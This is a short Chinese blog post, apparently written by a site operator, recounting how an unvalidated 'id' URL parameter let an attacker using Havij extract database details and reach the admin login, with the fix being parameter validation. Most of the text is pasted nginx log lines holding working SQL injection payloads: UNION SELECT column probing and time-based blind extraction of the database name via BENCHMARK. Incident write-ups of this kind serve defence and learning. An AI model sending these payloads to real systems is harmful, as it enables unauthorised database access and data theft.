您的位置：首页 > 数据库 > MySQL

mysql 数据库信息泄露

2013-02-20 17:48 162 查看

昨天，发现系统被人通过程序漏洞，获取到了数据库的信息，并获取系统的后台登录账号进行了登录。

问题产生的原因是系统一个url存在参数未过滤漏洞，导致别人通过这个url如http://daomain/a.php?xxxxxxxxx&id=23，在通过havij软件获取到了数据库信息。未过滤的参数就是id，在程序中没有做校验。

查找问题的过程，通过分析nginx的log，发现大量如下的代码，其中xxxxxxxxxxx&id=是我的正常的参数

xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--

xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D117%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D116%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3D117%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C109%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D114%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D120%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D119%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C91%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C97%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C100%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3D102%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3D101%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C109%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D114%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D113%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C124%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C126%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3D127%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3D126%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29

解决办法:

将正常url的参数做了校验，问题解决。

对于被获取到数据库信息的原理可以参考下http://blog.sina.com.cn/s/blog_5ded2e5b01010lkx.html

内容来自用户分享和网络整理，不保证内容的准确性，如有侵权内容，可联系管理员处理

标签：

相关文章推荐

新的分享

章节导航